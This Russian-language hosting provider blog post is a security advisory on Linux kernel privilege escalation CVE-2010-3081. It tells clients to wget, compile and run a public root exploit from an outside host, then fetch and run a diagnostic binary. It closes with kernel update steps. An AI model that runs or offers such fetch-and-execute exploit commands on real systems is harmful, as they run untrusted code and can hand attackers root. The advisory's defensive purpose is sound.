Блог Народного комиссариата виртуальных дел (НКВД.pro)

Уважаемые клиенты!

В ядре Linux начиная с версии 2.6.27 и до версии 2.6.34 включительно для архитектуры x86_64 обнаружена уязвимость (CVE-2010-3081), позволяющая локальному пользователю повысить свои привилегии до уровня root.

Для проверки, подвержен ли ваш сервер данной уязвимости, выполните действия (под обычным пользователем, НЕ под root!):

$ wget -N http://narkomat.net/cve2010-3081/cve_2010-3081_exploit.c
$ gcc ./cve_2010-3081_exploit.c -o ./exploit.bin
$ ./exploit.bin

Если ваш сервер уязвим, запустится sh с привилегиями root. Если не уязвим, появится ошибка:
symbol table not available, aborting!
Process finished

Если сервер подвержен уязвимости, необходимо проверить, не воспользовались ли ей злоумышленники:

$ wget http://narkomat.net/cve2010-3081/ksplice_diagnose-2010-3081
$ chmod +x ./ksplice_diagnose-2010-3081
$ ./ksplice_diagnose-2010-3081

В конце должно появиться сообщение:
Your system is free from the backdoors that would be left in memory
by the published exploit for CVE-2010-3081.

Устранение уязвимости:

Если ваш сервер подвержен уязвимости, вы можете устранить её самостоятельно путем обновления текущего ядра до не подверженного системными средствами) либо заказать проверку и устранение у нашего серверного отдела по адресу rdso гав-гав nkvdteam.ru.

В самых распространённых дистрибутивах Linux (Debian, CentOS, Ubuntu и Fedora) уязвимость уже исправлена — достаточно обновить ядро, используя apt\yum и перезагрузиться.

Обратите внимание, что на серверах в дата-центрах NetDirekt и Greatnet (Германия) по-умолчанию устанавливается уязвимое ядро, которое НЕ обновляется командами apt-get upgrade / yum update. Требуется установить пакет kernel и вписать дистрибутивное ядро в /boot/grub/menu.lst, после чего
перезагрузить сервер.

Помните, что за незаконные действия, совершённые со взломанного сервера, отвечать перед дата-центром приходится арендатору.